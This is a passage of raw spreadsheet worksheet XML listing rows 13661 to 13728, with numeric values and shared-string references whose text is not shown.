        <v>10480</v>
      </c>
      <c r="F13661" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13662" ht="15.75" customHeight="1">
      <c r="A13662" s="1">
        <v>18635.0</v>
      </c>
      <c r="B13662" s="2">
        <v>5.3392252E7</v>
      </c>
      <c r="C13662" s="2" t="s">
        <v>13150</v>
      </c>
      <c r="D13662" s="2">
        <v>1.0</v>
      </c>
      <c r="E13662" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13662" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13663" ht="15.75" customHeight="1">
      <c r="A13663" s="1">
        <v>18663.0</v>
      </c>
      <c r="B13663" s="2">
        <v>5.3520228E7</v>
      </c>
      <c r="C13663" s="2" t="s">
        <v>13151</v>
      </c>
      <c r="D13663" s="2">
        <v>1.0</v>
      </c>
      <c r="E13663" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13663" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13664" ht="15.75" customHeight="1">
      <c r="A13664" s="1">
        <v>18692.0</v>
      </c>
      <c r="B13664" s="2">
        <v>5.3599456E7</v>
      </c>
      <c r="C13664" s="2" t="s">
        <v>13152</v>
      </c>
      <c r="D13664" s="2">
        <v>1.0</v>
      </c>
      <c r="E13664" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13664" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13665" ht="15.75" customHeight="1">
      <c r="A13665" s="1">
        <v>18731.0</v>
      </c>
      <c r="B13665" s="2">
        <v>5.37135E7</v>
      </c>
      <c r="C13665" s="2" t="s">
        <v>13153</v>
      </c>
      <c r="D13665" s="2">
        <v>1.0</v>
      </c>
      <c r="E13665" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13665" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13666" ht="15.75" customHeight="1">
      <c r="A13666" s="1">
        <v>18825.0</v>
      </c>
      <c r="B13666" s="2">
        <v>5.3931081E7</v>
      </c>
      <c r="C13666" s="2" t="s">
        <v>13154</v>
      </c>
      <c r="D13666" s="2">
        <v>1.0</v>
      </c>
      <c r="E13666" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13666" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13667" ht="15.75" customHeight="1">
      <c r="A13667" s="1">
        <v>18955.0</v>
      </c>
      <c r="B13667" s="2">
        <v>5.4351657E7</v>
      </c>
      <c r="C13667" s="2" t="s">
        <v>13155</v>
      </c>
      <c r="D13667" s="2">
        <v>1.0</v>
      </c>
      <c r="E13667" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13667" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13668" ht="15.75" customHeight="1">
      <c r="A13668" s="1">
        <v>19023.0</v>
      </c>
      <c r="B13668" s="2">
        <v>5.4552554E7</v>
      </c>
      <c r="C13668" s="2" t="s">
        <v>13156</v>
      </c>
      <c r="D13668" s="2">
        <v>1.0</v>
      </c>
      <c r="E13668" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13668" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13669" ht="15.75" customHeight="1">
      <c r="A13669" s="1">
        <v>19427.0</v>
      </c>
      <c r="B13669" s="2">
        <v>5.5666562E7</v>
      </c>
      <c r="C13669" s="2" t="s">
        <v>13157</v>
      </c>
      <c r="D13669" s="2">
        <v>1.0</v>
      </c>
      <c r="E13669" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13669" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13670" ht="15.75" customHeight="1">
      <c r="A13670" s="1">
        <v>19538.0</v>
      </c>
      <c r="B13670" s="2">
        <v>5.6025887E7</v>
      </c>
      <c r="C13670" s="2" t="s">
        <v>13158</v>
      </c>
      <c r="D13670" s="2">
        <v>1.0</v>
      </c>
      <c r="E13670" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13670" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13671" ht="15.75" customHeight="1">
      <c r="A13671" s="1">
        <v>19580.0</v>
      </c>
      <c r="B13671" s="2">
        <v>5.6152122E7</v>
      </c>
      <c r="C13671" s="2" t="s">
        <v>13159</v>
      </c>
      <c r="D13671" s="2">
        <v>1.0</v>
      </c>
      <c r="E13671" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13671" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13672" ht="15.75" customHeight="1">
      <c r="A13672" s="1">
        <v>19688.0</v>
      </c>
      <c r="B13672" s="2">
        <v>5.6470143E7</v>
      </c>
      <c r="C13672" s="2" t="s">
        <v>13160</v>
      </c>
      <c r="D13672" s="2">
        <v>1.0</v>
      </c>
      <c r="E13672" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13672" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13673" ht="15.75" customHeight="1">
      <c r="A13673" s="1">
        <v>19748.0</v>
      </c>
      <c r="B13673" s="2">
        <v>5.6699282E7</v>
      </c>
      <c r="C13673" s="5" t="s">
        <v>13161</v>
      </c>
      <c r="D13673" s="2">
        <v>1.0</v>
      </c>
      <c r="E13673" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13673" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13674" ht="15.75" customHeight="1">
      <c r="A13674" s="1">
        <v>19993.0</v>
      </c>
      <c r="B13674" s="2">
        <v>5.7654601E7</v>
      </c>
      <c r="C13674" s="2" t="s">
        <v>13162</v>
      </c>
      <c r="D13674" s="2">
        <v>1.0</v>
      </c>
      <c r="E13674" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13674" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13675" ht="15.75" customHeight="1">
      <c r="A13675" s="1">
        <v>20826.0</v>
      </c>
      <c r="B13675" s="2">
        <v>1.5412881E7</v>
      </c>
      <c r="C13675" s="2" t="s">
        <v>13163</v>
      </c>
      <c r="D13675" s="2">
        <v>1.0</v>
      </c>
      <c r="E13675" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13675" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13676" ht="15.75" customHeight="1">
      <c r="A13676" s="1">
        <v>20831.0</v>
      </c>
      <c r="B13676" s="2">
        <v>1.5513397E7</v>
      </c>
      <c r="C13676" s="2" t="s">
        <v>13164</v>
      </c>
      <c r="D13676" s="2">
        <v>1.0</v>
      </c>
      <c r="E13676" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13676" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13677" ht="15.75" customHeight="1">
      <c r="A13677" s="1">
        <v>20841.0</v>
      </c>
      <c r="B13677" s="2">
        <v>1.5645246E7</v>
      </c>
      <c r="C13677" s="2" t="s">
        <v>13165</v>
      </c>
      <c r="D13677" s="2">
        <v>1.0</v>
      </c>
      <c r="E13677" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13677" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13678" ht="15.75" customHeight="1">
      <c r="A13678" s="1">
        <v>20915.0</v>
      </c>
      <c r="B13678" s="2">
        <v>1.6365754E7</v>
      </c>
      <c r="C13678" s="2" t="s">
        <v>13166</v>
      </c>
      <c r="D13678" s="2">
        <v>1.0</v>
      </c>
      <c r="E13678" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13678" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13679" ht="15.75" customHeight="1">
      <c r="A13679" s="1">
        <v>20939.0</v>
      </c>
      <c r="B13679" s="2">
        <v>1.6479501E7</v>
      </c>
      <c r="C13679" s="2" t="s">
        <v>13167</v>
      </c>
      <c r="D13679" s="2">
        <v>1.0</v>
      </c>
      <c r="E13679" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13679" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13680" ht="15.75" customHeight="1">
      <c r="A13680" s="1">
        <v>21092.0</v>
      </c>
      <c r="B13680" s="2">
        <v>1.8062324E7</v>
      </c>
      <c r="C13680" s="2" t="s">
        <v>13168</v>
      </c>
      <c r="D13680" s="2">
        <v>1.0</v>
      </c>
      <c r="E13680" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13680" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13681" ht="15.75" customHeight="1">
      <c r="A13681" s="1">
        <v>21343.0</v>
      </c>
      <c r="B13681" s="2">
        <v>2.1171937E7</v>
      </c>
      <c r="C13681" s="2" t="s">
        <v>13169</v>
      </c>
      <c r="D13681" s="2">
        <v>1.0</v>
      </c>
      <c r="E13681" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13681" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13682" ht="15.75" customHeight="1">
      <c r="A13682" s="1">
        <v>21454.0</v>
      </c>
      <c r="B13682" s="2">
        <v>2.2651642E7</v>
      </c>
      <c r="C13682" s="2" t="s">
        <v>13170</v>
      </c>
      <c r="D13682" s="2">
        <v>1.0</v>
      </c>
      <c r="E13682" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13682" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13683" ht="15.75" customHeight="1">
      <c r="A13683" s="1">
        <v>21676.0</v>
      </c>
      <c r="B13683" s="2">
        <v>2.5036013E7</v>
      </c>
      <c r="C13683" s="2" t="s">
        <v>13171</v>
      </c>
      <c r="D13683" s="2">
        <v>1.0</v>
      </c>
      <c r="E13683" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13683" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13684" ht="15.75" customHeight="1">
      <c r="A13684" s="1">
        <v>21743.0</v>
      </c>
      <c r="B13684" s="2">
        <v>2.5923358E7</v>
      </c>
      <c r="C13684" s="2" t="s">
        <v>13172</v>
      </c>
      <c r="D13684" s="2">
        <v>1.0</v>
      </c>
      <c r="E13684" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13684" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13685" ht="15.75" customHeight="1">
      <c r="A13685" s="1">
        <v>22024.0</v>
      </c>
      <c r="B13685" s="2">
        <v>3.0098063E7</v>
      </c>
      <c r="C13685" s="2" t="s">
        <v>13173</v>
      </c>
      <c r="D13685" s="2">
        <v>1.0</v>
      </c>
      <c r="E13685" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13685" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13686" ht="15.75" customHeight="1">
      <c r="A13686" s="1">
        <v>22093.0</v>
      </c>
      <c r="B13686" s="2">
        <v>3.0770666E7</v>
      </c>
      <c r="C13686" s="2" t="s">
        <v>13174</v>
      </c>
      <c r="D13686" s="2">
        <v>1.0</v>
      </c>
      <c r="E13686" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13686" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13687" ht="15.75" customHeight="1">
      <c r="A13687" s="1">
        <v>22191.0</v>
      </c>
      <c r="B13687" s="2">
        <v>3.1791009E7</v>
      </c>
      <c r="C13687" s="2" t="s">
        <v>13175</v>
      </c>
      <c r="D13687" s="2">
        <v>1.0</v>
      </c>
      <c r="E13687" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13687" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13688" ht="15.75" customHeight="1">
      <c r="A13688" s="1">
        <v>22207.0</v>
      </c>
      <c r="B13688" s="2">
        <v>3.2081988E7</v>
      </c>
      <c r="C13688" s="2" t="s">
        <v>13176</v>
      </c>
      <c r="D13688" s="2">
        <v>1.0</v>
      </c>
      <c r="E13688" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13688" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13689" ht="15.75" customHeight="1">
      <c r="A13689" s="1">
        <v>22376.0</v>
      </c>
      <c r="B13689" s="2">
        <v>3.5061454E7</v>
      </c>
      <c r="C13689" s="2" t="s">
        <v>13177</v>
      </c>
      <c r="D13689" s="2">
        <v>1.0</v>
      </c>
      <c r="E13689" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13689" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13690" ht="15.75" customHeight="1">
      <c r="A13690" s="1">
        <v>22605.0</v>
      </c>
      <c r="B13690" s="2">
        <v>3.9690465E7</v>
      </c>
      <c r="C13690" s="2" t="s">
        <v>13178</v>
      </c>
      <c r="D13690" s="2">
        <v>1.0</v>
      </c>
      <c r="E13690" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13690" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13691" ht="15.75" customHeight="1">
      <c r="A13691" s="1">
        <v>22611.0</v>
      </c>
      <c r="B13691" s="2">
        <v>3.9975883E7</v>
      </c>
      <c r="C13691" s="2" t="s">
        <v>13179</v>
      </c>
      <c r="D13691" s="2">
        <v>1.0</v>
      </c>
      <c r="E13691" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13691" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13692" ht="15.75" customHeight="1">
      <c r="A13692" s="1">
        <v>22899.0</v>
      </c>
      <c r="B13692" s="2">
        <v>4.797504E7</v>
      </c>
      <c r="C13692" s="2" t="s">
        <v>13180</v>
      </c>
      <c r="D13692" s="2">
        <v>1.0</v>
      </c>
      <c r="E13692" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13692" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13693" ht="15.75" customHeight="1">
      <c r="A13693" s="1">
        <v>22968.0</v>
      </c>
      <c r="B13693" s="2">
        <v>4.9228525E7</v>
      </c>
      <c r="C13693" s="2" t="s">
        <v>13181</v>
      </c>
      <c r="D13693" s="2">
        <v>1.0</v>
      </c>
      <c r="E13693" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13693" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13694" ht="15.75" customHeight="1">
      <c r="A13694" s="1">
        <v>23087.0</v>
      </c>
      <c r="B13694" s="2">
        <v>5.0657804E7</v>
      </c>
      <c r="C13694" s="2" t="s">
        <v>13182</v>
      </c>
      <c r="D13694" s="2">
        <v>1.0</v>
      </c>
      <c r="E13694" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13694" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13695" ht="15.75" customHeight="1">
      <c r="A13695" s="1">
        <v>23162.0</v>
      </c>
      <c r="B13695" s="2">
        <v>5.1941081E7</v>
      </c>
      <c r="C13695" s="2" t="s">
        <v>13183</v>
      </c>
      <c r="D13695" s="2">
        <v>1.0</v>
      </c>
      <c r="E13695" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13695" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13696" ht="15.75" customHeight="1">
      <c r="A13696" s="1">
        <v>23596.0</v>
      </c>
      <c r="B13696" s="2">
        <v>6376163.0</v>
      </c>
      <c r="C13696" s="2" t="s">
        <v>13184</v>
      </c>
      <c r="D13696" s="2">
        <v>1.0</v>
      </c>
      <c r="E13696" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13696" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13697" ht="15.75" customHeight="1">
      <c r="A13697" s="1">
        <v>23599.0</v>
      </c>
      <c r="B13697" s="2">
        <v>6395445.0</v>
      </c>
      <c r="C13697" s="2" t="s">
        <v>13185</v>
      </c>
      <c r="D13697" s="2">
        <v>1.0</v>
      </c>
      <c r="E13697" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13697" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13698" ht="15.75" customHeight="1">
      <c r="A13698" s="1">
        <v>23655.0</v>
      </c>
      <c r="B13698" s="2">
        <v>6813041.0</v>
      </c>
      <c r="C13698" s="2" t="s">
        <v>13186</v>
      </c>
      <c r="D13698" s="2">
        <v>1.0</v>
      </c>
      <c r="E13698" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13698" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13699" ht="15.75" customHeight="1">
      <c r="A13699" s="1">
        <v>23659.0</v>
      </c>
      <c r="B13699" s="2">
        <v>6826176.0</v>
      </c>
      <c r="C13699" s="2" t="s">
        <v>13187</v>
      </c>
      <c r="D13699" s="2">
        <v>1.0</v>
      </c>
      <c r="E13699" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13699" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13700" ht="15.75" customHeight="1">
      <c r="A13700" s="1">
        <v>23904.0</v>
      </c>
      <c r="B13700" s="2">
        <v>8484353.0</v>
      </c>
      <c r="C13700" s="2" t="s">
        <v>13188</v>
      </c>
      <c r="D13700" s="2">
        <v>1.0</v>
      </c>
      <c r="E13700" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13700" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13701" ht="15.75" customHeight="1">
      <c r="A13701" s="1">
        <v>23977.0</v>
      </c>
      <c r="B13701" s="2">
        <v>9082285.0</v>
      </c>
      <c r="C13701" s="2" t="s">
        <v>13189</v>
      </c>
      <c r="D13701" s="2">
        <v>1.0</v>
      </c>
      <c r="E13701" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13701" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13702" ht="15.75" customHeight="1">
      <c r="A13702" s="1">
        <v>24292.0</v>
      </c>
      <c r="B13702" s="2">
        <v>1.0557879E7</v>
      </c>
      <c r="C13702" s="2" t="s">
        <v>13190</v>
      </c>
      <c r="D13702" s="2">
        <v>1.0</v>
      </c>
      <c r="E13702" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13702" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13703" ht="15.75" customHeight="1">
      <c r="A13703" s="1">
        <v>24514.0</v>
      </c>
      <c r="B13703" s="2">
        <v>1.1146114E7</v>
      </c>
      <c r="C13703" s="2" t="s">
        <v>13191</v>
      </c>
      <c r="D13703" s="2">
        <v>1.0</v>
      </c>
      <c r="E13703" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13703" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13704" ht="15.75" customHeight="1">
      <c r="A13704" s="1">
        <v>24780.0</v>
      </c>
      <c r="B13704" s="2">
        <v>1.1913288E7</v>
      </c>
      <c r="C13704" s="2" t="s">
        <v>13192</v>
      </c>
      <c r="D13704" s="2">
        <v>1.0</v>
      </c>
      <c r="E13704" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13704" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13705" ht="15.75" customHeight="1">
      <c r="A13705" s="1">
        <v>24873.0</v>
      </c>
      <c r="B13705" s="2">
        <v>1.2228129E7</v>
      </c>
      <c r="C13705" s="2" t="s">
        <v>13193</v>
      </c>
      <c r="D13705" s="2">
        <v>1.0</v>
      </c>
      <c r="E13705" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13705" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13706" ht="15.75" customHeight="1">
      <c r="A13706" s="1">
        <v>25876.0</v>
      </c>
      <c r="B13706" s="2">
        <v>1.4936527E7</v>
      </c>
      <c r="C13706" s="2" t="s">
        <v>13194</v>
      </c>
      <c r="D13706" s="2">
        <v>1.0</v>
      </c>
      <c r="E13706" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13706" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13707" ht="15.75" customHeight="1">
      <c r="A13707" s="1">
        <v>25981.0</v>
      </c>
      <c r="B13707" s="2">
        <v>1.5305185E7</v>
      </c>
      <c r="C13707" s="2" t="s">
        <v>13195</v>
      </c>
      <c r="D13707" s="2">
        <v>1.0</v>
      </c>
      <c r="E13707" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13707" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13708" ht="15.75" customHeight="1">
      <c r="A13708" s="1">
        <v>26083.0</v>
      </c>
      <c r="B13708" s="2">
        <v>1.5645245E7</v>
      </c>
      <c r="C13708" s="2" t="s">
        <v>13165</v>
      </c>
      <c r="D13708" s="2">
        <v>1.0</v>
      </c>
      <c r="E13708" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13708" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13709" ht="15.75" customHeight="1">
      <c r="A13709" s="1">
        <v>26621.0</v>
      </c>
      <c r="B13709" s="2">
        <v>1.8041194E7</v>
      </c>
      <c r="C13709" s="2" t="s">
        <v>13196</v>
      </c>
      <c r="D13709" s="2">
        <v>1.0</v>
      </c>
      <c r="E13709" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13709" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13710" ht="15.75" customHeight="1">
      <c r="A13710" s="1">
        <v>26670.0</v>
      </c>
      <c r="B13710" s="2">
        <v>1.8062323E7</v>
      </c>
      <c r="C13710" s="2" t="s">
        <v>13197</v>
      </c>
      <c r="D13710" s="2">
        <v>1.0</v>
      </c>
      <c r="E13710" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13710" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13711" ht="15.75" customHeight="1">
      <c r="A13711" s="1">
        <v>26730.0</v>
      </c>
      <c r="B13711" s="2">
        <v>1.8274131E7</v>
      </c>
      <c r="C13711" s="2" t="s">
        <v>13198</v>
      </c>
      <c r="D13711" s="2">
        <v>1.0</v>
      </c>
      <c r="E13711" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13711" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13712" ht="15.75" customHeight="1">
      <c r="A13712" s="1">
        <v>26808.0</v>
      </c>
      <c r="B13712" s="2">
        <v>1.870692E7</v>
      </c>
      <c r="C13712" s="2" t="s">
        <v>13199</v>
      </c>
      <c r="D13712" s="2">
        <v>1.0</v>
      </c>
      <c r="E13712" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13712" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13713" ht="15.75" customHeight="1">
      <c r="A13713" s="1">
        <v>27490.0</v>
      </c>
      <c r="B13713" s="2">
        <v>2.2039069E7</v>
      </c>
      <c r="C13713" s="2" t="s">
        <v>13200</v>
      </c>
      <c r="D13713" s="2">
        <v>1.0</v>
      </c>
      <c r="E13713" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13713" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13714" ht="15.75" customHeight="1">
      <c r="A13714" s="1">
        <v>27615.0</v>
      </c>
      <c r="B13714" s="2">
        <v>2.2651641E7</v>
      </c>
      <c r="C13714" s="2" t="s">
        <v>13201</v>
      </c>
      <c r="D13714" s="2">
        <v>1.0</v>
      </c>
      <c r="E13714" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13714" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13715" ht="15.75" customHeight="1">
      <c r="A13715" s="1">
        <v>27841.0</v>
      </c>
      <c r="B13715" s="2">
        <v>2.3421611E7</v>
      </c>
      <c r="C13715" s="2" t="s">
        <v>13202</v>
      </c>
      <c r="D13715" s="2">
        <v>1.0</v>
      </c>
      <c r="E13715" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13715" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13716" ht="15.75" customHeight="1">
      <c r="A13716" s="1">
        <v>28089.0</v>
      </c>
      <c r="B13716" s="2">
        <v>2.4649048E7</v>
      </c>
      <c r="C13716" s="2" t="s">
        <v>13203</v>
      </c>
      <c r="D13716" s="2">
        <v>1.0</v>
      </c>
      <c r="E13716" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13716" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13717" ht="15.75" customHeight="1">
      <c r="A13717" s="1">
        <v>28342.0</v>
      </c>
      <c r="B13717" s="2">
        <v>2.5923357E7</v>
      </c>
      <c r="C13717" s="2" t="s">
        <v>13172</v>
      </c>
      <c r="D13717" s="2">
        <v>1.0</v>
      </c>
      <c r="E13717" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13717" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13718" ht="15.75" customHeight="1">
      <c r="A13718" s="1">
        <v>28496.0</v>
      </c>
      <c r="B13718" s="2">
        <v>2.6687322E7</v>
      </c>
      <c r="C13718" s="2" t="s">
        <v>13204</v>
      </c>
      <c r="D13718" s="2">
        <v>1.0</v>
      </c>
      <c r="E13718" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13718" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13719" ht="15.75" customHeight="1">
      <c r="A13719" s="1">
        <v>29019.0</v>
      </c>
      <c r="B13719" s="2">
        <v>3.0098062E7</v>
      </c>
      <c r="C13719" s="2" t="s">
        <v>13173</v>
      </c>
      <c r="D13719" s="2">
        <v>1.0</v>
      </c>
      <c r="E13719" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13719" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13720" ht="15.75" customHeight="1">
      <c r="A13720" s="1">
        <v>29146.0</v>
      </c>
      <c r="B13720" s="2">
        <v>3.0589322E7</v>
      </c>
      <c r="C13720" s="2" t="s">
        <v>13205</v>
      </c>
      <c r="D13720" s="2">
        <v>1.0</v>
      </c>
      <c r="E13720" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13720" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13721" ht="15.75" customHeight="1">
      <c r="A13721" s="1">
        <v>29150.0</v>
      </c>
      <c r="B13721" s="2">
        <v>3.0589322E7</v>
      </c>
      <c r="C13721" s="2" t="s">
        <v>13206</v>
      </c>
      <c r="D13721" s="2">
        <v>1.0</v>
      </c>
      <c r="E13721" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13721" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13722" ht="15.75" customHeight="1">
      <c r="A13722" s="1">
        <v>29496.0</v>
      </c>
      <c r="B13722" s="2">
        <v>3.26474E7</v>
      </c>
      <c r="C13722" s="2" t="s">
        <v>13207</v>
      </c>
      <c r="D13722" s="2">
        <v>1.0</v>
      </c>
      <c r="E13722" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13722" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13723" ht="15.75" customHeight="1">
      <c r="A13723" s="1">
        <v>29810.0</v>
      </c>
      <c r="B13723" s="2">
        <v>3.5174229E7</v>
      </c>
      <c r="C13723" s="2" t="s">
        <v>13208</v>
      </c>
      <c r="D13723" s="2">
        <v>1.0</v>
      </c>
      <c r="E13723" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13723" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13724" ht="15.75" customHeight="1">
      <c r="A13724" s="1">
        <v>30047.0</v>
      </c>
      <c r="B13724" s="2">
        <v>3.6241808E7</v>
      </c>
      <c r="C13724" s="2" t="s">
        <v>13209</v>
      </c>
      <c r="D13724" s="2">
        <v>1.0</v>
      </c>
      <c r="E13724" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13724" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13725" ht="15.75" customHeight="1">
      <c r="A13725" s="1">
        <v>30175.0</v>
      </c>
      <c r="B13725" s="2">
        <v>3.7154027E7</v>
      </c>
      <c r="C13725" s="2" t="s">
        <v>13210</v>
      </c>
      <c r="D13725" s="2">
        <v>1.0</v>
      </c>
      <c r="E13725" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13725" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13726" ht="15.75" customHeight="1">
      <c r="A13726" s="1">
        <v>30402.0</v>
      </c>
      <c r="B13726" s="2">
        <v>3.8697756E7</v>
      </c>
      <c r="C13726" s="2" t="s">
        <v>13211</v>
      </c>
      <c r="D13726" s="2">
        <v>1.0</v>
      </c>
      <c r="E13726" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13726" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13727" ht="15.75" customHeight="1">
      <c r="A13727" s="1">
        <v>30887.0</v>
      </c>
      <c r="B13727" s="2">
        <v>4.6525288E7</v>
      </c>
      <c r="C13727" s="2" t="s">
        <v>13195</v>
      </c>
      <c r="D13727" s="2">
        <v>1.0</v>
      </c>
      <c r="E13727" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13727" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13728" ht="15.75" customHeight="1">
      <c r="A13728" s="1">
        <v>30890.0</v>
      </c>
      <c r="B13728" s="2">
        <v>4.6571998E7</v>
      </c>
      <c r="C13728" s="2" t="s">
        <v>13212</v>
      </c>
      <c r="D13728" s="2">
        <v>1.0</v>
      </c>
      <c r="E13728" s="3" t="s">
